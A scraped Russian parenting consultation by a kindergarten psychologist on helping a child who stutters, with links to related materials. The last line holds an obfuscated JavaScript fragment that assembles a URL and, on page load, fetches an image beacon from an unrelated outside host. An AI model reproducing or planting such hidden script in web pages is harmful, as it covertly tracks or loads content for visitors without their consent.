Консультация для родителей "Как помочь ребенку, если он заикается"
консультация по коррекционной педагогике

Полева Галина Петровна

Роль родителей в преодолении заикания у ребенка огромная. Какую помощь родители могут окзать своему ребенку в случае заикания рассказывается в данной консультации.

Скачать:

ВложениеРазмер
Файл kak_pomoch_rebenku_esli_on_zaikaetsya.docx36.46 КБ

Предварительный просмотр:

государственное бюджетное общеобразовательное   учреждение Самарской области средняя общеобразовательная школа №1 «Образовательный центр» имени 21 армии Вооруженных сил СССР п.г.т. Стройкерамика   муниципального района Волжский Самарской области

  структурное подразделение Детский сад «Солнышко»

Консультация для родителей «Как помочь ребенку, если он заикается»

Педагог-психолог Полева Г.П.

Отчаяние и часто чувство вины охватывает родителей заикающихся детей. Почему ещё недавно малыш говорил хорошо, а сейчас и слова не может произнести? Чем можно помочь ребёнку? Такие вопросы охватывают родителей, когда ребенок вдруг начинает заикаться. Заикание — это серьезное нарушение речи и к нему нельзя надеяться что со временем все пройдет. Роль родителей в процессе преодоления заикания у ребёнка переоценить невозможно. Первый вопрос, который задают практически все родители: «Почему мой ребенок тал заикаться, ведь он хорошо говорил???»

В большинстве случаев, заикание возникает именно на этапе интенсивного развития речи в возрасте от двух до пяти лет, когда идет активное формирование координированной системы речевых движений и мышления. Важно понимать, что заикание не просто дефект речи, а проявление общего невроза, то есть расстройство не только речевой системы, но и организма в целом. Заикание может возникать остро, то есть внезапно, вследствие какой-либо психотравмы или нарастать постепенно, без видимых причин, иногда в течение нескольких месяцев.

Что может послужить причиной заикания?

Любой сильный раздражитель, не обязательно сугубо отрицательного характера. Даже резкая смена обстановки, вид незнакомого животного может вывести ребенка из равновесия. В результате нарушается нормальное взаимодействие коры головного мозга с подкоркой, которая и регулирует темп и ритм речи.

Нередко заикание возникает при неровном отношении к ребенку взрослых: от наказаний переходят к заласкиванию, один из родителей запрещает что-то, а другой разрешает. Ссоры между отцом и матерью, напряженная обстановка в семье также отрицательно влияют на нервное состояние ребенка, а значит, создают почву для расстройства речи.

Форсирование речевого развития ребенка. Родители настаивают, чтобы ребёнок заучивал трудные многосложные слова, непонятные ему стихотворения, рано начинают обучать грамоте, демонстрируют речевые достижения малыша своим знакомым.

Задержка развития речи. Иногда ребенок знает и понимает больше, чем может выразить речью, он подыскивает слова и выражения, повторяя и повторяя звуки и слоги, как бы на ощупь выбирая соответствующие языковые средства. Эта привычка закрепляется и также может привести к заиканию.

Перенесенные инфекционные заболевание (особенно при осложнениях на центральную нервную систему), и поражения головного мозга в раннем детском возрасте (внутриутробные, природовые и другие травмы).

Лечение при заикании нужно начинать немедленно, как только оно возникло — в начальной стадии. И подход к преодолению неплавности речи обязательно должен быть комплексным. Советуем обратиться родителям к врачам – нервопатологам. Медицинские препараты подбираются индивидуально для каждого ребенка, однозначной, подходящей для всех схемы лечения не существует. Иногда необходимые ребенку лекарства «угадываются» не сразу, подбор может занимать 2-3 месяца. Заикающийся ребенок должен наблюдаться у врача не только в период прохождения курса лечения, но и достаточно долго, иногда 2-3 года, уже после того, как речь нормализуется. Связано это с тем, что несмотря на избавление от запинок, уровень адаптивных возможностей центральной нервной системы ребенка остается низким, а значит, возможен рецидив заикания, особенно в кризисные периоды развития ребенка.

Специальные логопедические занятия, улучшающие речь ребенка, обычно первые два месяца при внезапно возникшем заикании  не проводятся. Вводится охранительный режим речи. Также обратиться к психологу. Квалифицированный специалист поможет ребёнку отреагировать возможные психотравмы – испуг, конфликт, неожиданное изменение образа жизни (начало посещения детского сада, рождение младшего брата или сестры, переезд и т.п.). 

Как вести себя с ребёнком, если появилось заикание?

Прежде всего, не паникуйтеНи в коем случае нельзя показывать свою озабоченность по поводу заикания и даже употреблять при ребенке само слово «заикание». Нельзя требовать от ребенка плавной речи, стыдить и наказывать его, сообщать ребенку, что он «сказал плохо», и не просить, чтобы он «сказал хорошо».  И, конечно, недопустимы передразнивания и насмешки.

Создайте условия для нормализации эмоционального состояния ребенка. Само по себе ровное, спокойное, доброжелательное общение с ребенком, гармоничные отношения между всеми членами семьи  — необходимое условие для лечения заикания. Но это не значит, что заикающегося ребенка надо считать больным, чрезмерно опекать, потакать его капризам. Разумная требовательность остается, а вот конфликтов и резкостей в обращении следует избегать.

Помогите ребёнку изменить манеру речи. Помните, что дети подражают речи окружающих взрослых. Постарайтесь  говорить меньше и не торопясь, короткими и понятными фразами, употребляя простые, знакомые ребенку слова. Ваша речь должна быть четкой, лаконичной и плавной. Важное условие – научиться шире открывать рот, хорошо артикулируя гласные (я не предлагаю проговаривать слова нараспев). Не требуя от ребенка, чтобы он говорил медленно, сами почаще говорите и читайте ему медленно, плавно, широко открывая рот, чтобы ребенок воспользовался этим приемом неосознанно, по подражанию. Замечено, что через две недели такого речевого режима дети начинают вслед за родителями говорить медленнее и чётче. А два месяца соблюдения новых правил речи в семье (подчёркиваю – не только ребёнком, а всеми членами семьи! Это важно!!!) позволяют свести запинки на нет даже без вмешательства логопеда.

Не провоцируйте ребенка на речь. Не задавайте ребенку слишком много вопросов, вовлекая его в сложные беседы. Проанализируйте, сколько и каких вопросов вы задаете своему ребенку. Учитесь выдерживать паузу, прежде чем что-то сказать. Некоторая медлительность взрослых всегда действует на детей внушающим образом.

Подумайте, как организовать вашу совместную жизнь с ребенком так, чтобы его не надо было подгонять. Ваша задача — научить ребенка говорить медленнее. И она становится абсолютно невыполнимой, когда вы начинаете спешить и торопить ребенка, делая его жизнь еще более напряженной. Примерно каждый второй ребенок не справляется с темпом, предлагаемым ему взрослым, не у всех получается сразу оторваться от увлекательного занятия, быстро выполнить вашу просьбу. Так же, как и себе, давайте ребенку достаточный запас времени — «вот эту машинку в гараж поставишь, и мы будем…», «скоро я позвоню в колокольчик, и мы начнем…». Если обстоятельства складываются так, что действовать надо немедленно, не вступайте в препирательства, не торгуйтесь, уверенно и весело приказывайте. Иногда, без лишних слов, мягко обнимите и уведите. Всегда действуйте по ситуации и интуиции. Сложные моменты в вашем взаимодействии с ребенком возникают ежедневно, не бойтесь экспериментировать.

Важно в целом организовать режим так, чтобы необходимость говорить у ребенка возникала как можно реже, а не ссориться с ним и запрещать привычные вещи.

Большую часть дня занимайте ребенка занятиями, которые не требуют развернутой речи. Режим ребенка нужно организовать так, чтобы необходимость в речи почти не возникала. Это, конечно, трудно, но возможно:

Можно играть в настольные игры, вытаскивайте из дальнего угла мозаику, лото, домино, пластилин, глину. В каждом доме есть конструктор, какой-то строительный материал, кубики. Строить, разрушать, восстанавливать — замечательная возможность для ребенка учиться владеть ситуацией и принимать решения. Эта простая последовательность действий — построил-сломал, дает ребенку ощущение контроля и предсказуемости, помогает справиться со страхами, проявить естественную агрессивность в безопасной игровой ситуации. Начинайте игру вместе с ребенком, но не берите инициативу в свои руки, давайте ребенку возможность проявить себя. Очень скоро он с удовольствием будет играть один, и вам останется только пополнять коллекцию новыми элементами, чтобы разнообразить игру.

Рисовать лучше всего гуашью на больших листах бумаги большими кисточками или пальцами. Так ребенок сможет наиболее полно выразить свое эмоциональное состояние, и вам будет над чем подумать. Только не надо поправлять его и учить рисовать «правильно».

Полезно петь для ребенка и вместе с ребенком, вспоминать песенки из своего детства, танцевать и просто двигаться под музыку.

Очень укрепляют нервную систему игры с песком и водой.  Эффективны и полезны также игры на развитие дыхания. Пускайте с детьми мыльные пузыри, учите задувать свечи, дуть через трубочку в стакан с водой, сдувать вату с ладони и т.п. Такие упражнения очень нравятся малышам, и оказывают благотворное влияние на формирование речевого выдоха.

Логопедические занятия показаны с 3-х лет, если заикание отмечается более 2-3 месяцев и перешло уже в стадию закрепившегося. Если кроме нарушения плавности наблюдается задержка речевого развития, то начинать надо с неё. Вряд ли речь станет плавной, когда у ребёнка ограничен словарный запас или он затрудняется построить фразу. Теперь после завершения охранительного режима речи (в первые 2 месяца появления заикания) пора перейти к активным занятиям по развитию речевых способностей.

Помние, что заикание – нарушение действительно очень непростое, нопреодолимое. 

Интернет—ресурсы:

  1. https://www.b17.ru/article/zaikanie_kak__pomoh__rebenku/
  2. http://lastochka1.ru/f/zaikaniedocx.pdf


По теме: методические разработки, презентации и конспекты

Как помочь ребенку, если он забывает, путает, неправильно пишет буквы?

Несколько практических советов о том, как помочь ребенку запомнить буквы...

Как помочь ребенку, если он забывает, путает, не правильно пишет буквы.

Материал будет полезен родителям и воспитателям, заинтересованным в обучении дошкольников. Игры позволят в дальнейшем избежать грубых ошибок на письме и в чтении....

консультация для родителей и педагогов "Если ребёнок заикается"

Что делать если ребёнок заикается? В консультации даются рекомендации родителям и педагогом в работе и воспитании детей с заиканием....

Как помочь ребенку, если он забывает, путает, неправильно пишет буквы

Прежде всего, надо выяснить:Различает ли ребенок понятия «слева» и «справа»?Умеет ли ваш ребенок складывать разрезные картинки из 4 – 6 частей?...

Консультация "Как помочь ребенку, если он путает буквы"

Данная консультация поможет родителям своевременно оказать помощь своему ребенку, если он забывает, путает или неправильно пишет буквы....

Как помочь ребенку, если у него неожиданно возник новый страх.

Советы детского психолога. Семь шагов, которые помогут вашему ребенку, если у него возник новый страх....

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...